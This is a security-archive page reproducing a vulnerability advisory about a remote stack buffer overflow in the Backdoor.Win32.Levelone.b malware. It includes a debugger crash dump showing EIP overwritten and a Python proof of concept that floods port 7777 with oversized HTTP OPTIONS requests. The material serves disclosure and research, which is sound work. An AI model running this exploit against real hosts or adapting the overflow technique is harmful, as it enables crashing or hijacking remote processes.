what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Backdoor.Win32.Levelone.b MVID-2021-0021 Remote Stack Buffer Overflow

Backdoor.Win32.Levelone.b MVID-2021-0021 Remote Stack Buffer Overflow
Posted Jan 11, 2021
Authored by malvuln | Site malvuln.com

Backdoor.Win32.Levelone.b malware suffers from a stack buffer overflow vulnerability.

tags | exploit, overflow
systems | windows
SHA-256 | 90583a534f7d93ac2f8af0f02ec8ac44ebf3c090acb82b4d2fd68a8f9ea96b6e

Backdoor.Win32.Levelone.b MVID-2021-0021 Remote Stack Buffer Overflow

Change Mirror Download
Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/3f82e6ddc9f5242f5af200d2fbae4ce4.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Levelone.b
Vulnerability: Remote Stack Buffer Overflow
Description: The backdoor listens on Port 7777, sending two large consecutive HTTP OPTIONS requests trigger the buffer overflow overwriting EIP.
Type: PE32
MD5: 3f82e6ddc9f5242f5af200d2fbae4ce4
Vuln ID: MVID-2021-0021
Dropped files: Vector64.exe
Network Access: Remote
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/10/2021

Memory Dump:
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(b9c.1424): Access violation - code c0000005 (first/second chance not available)
eax=000a13a4 ebx=0019ff70 ecx=0040109a edx=773e9d70 esi=ffffffff edi=0040801c
eip=41414141 esp=000a1388 ebp=000a13ac iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???

FAULTING_IP:
+d0cf3c0
41414141 ?? ???

EXCEPTION_RECORD: 0019f7f0 -- (.exr 0x19f7f0)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414141
Attempt to read from address 41414141

PROCESS_NAME: Vector64.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000008

EXCEPTION_PARAMETER2: 41414141

WRITE_ADDRESS: 41414141

FOLLOWUP_IP:
+d0cf3c0
41414141 ?? ???

FAILED_INSTRUCTION_ADDRESS:
+d0cf3c0
41414141 ?? ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT: 0019f840 -- (.cxr 0x19f840)
eax=0040a371 ebx=0040513c ecx=b3be0a93 edx=0019fbd4 esi=00005231 edi=00005235
eip=41414141 esp=0019fca0 ebp=0019fcc4 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
41414141 ?? ???
Resetting default scope

ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER: from 00402a5b to 41414141

FAULTING_THREAD: ffffffff

BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

STACK_TEXT:
0019fca0 41414141 unknown!printable+0x0
0019fca4 00402a5b vector64+0x2a5b
0019fccc 00402452 vector64+0x2452
0019fd14 0040253b vector64+0x253b
0019ff34 00402961 vector64+0x2961
0019ff3c 00401222 vector64+0x1222
0019ff88 76e38654 kernel32!BaseThreadInitThunk+0x24
0019ff9c 773c4a77 ntdll!__RtlUserThreadStart+0x2f
0019ffe4 773c4a47 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND: .cxr 000000000019F840 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 19fca0 ; kb

POSSIBLE_INVALID_CONTROL_TRANSFER: from 00402a56 to 00403800

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: hardware

IMAGE_NAME: hardware

DEBUG_FLR_IMAGE_TIMESTAMP: 0

BUCKET_ID: CPU_CALL_ERROR

FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_hardware!Unknown



Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=7777
sz = 20000
c=1

def doit():
global c, sz
while True:
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
s.settimeout(0.3)
sz += 1000
JUNK="A"*sz
PAYLOAD="OPTIONS /"+JUNK+" HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
s.send(PAYLOAD)
print(sz)
s.close()
time.sleep(0.2)
c+=1
if c==3:
print("Backdoor.Win32.Levelone.b / Remote Stack Buffer Overflow")
print("MD5: 3f82e6ddc9f5242f5af200d2fbae4ce4")
print("By Malvuln")
break

if __name__=="__main__":
doit()

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close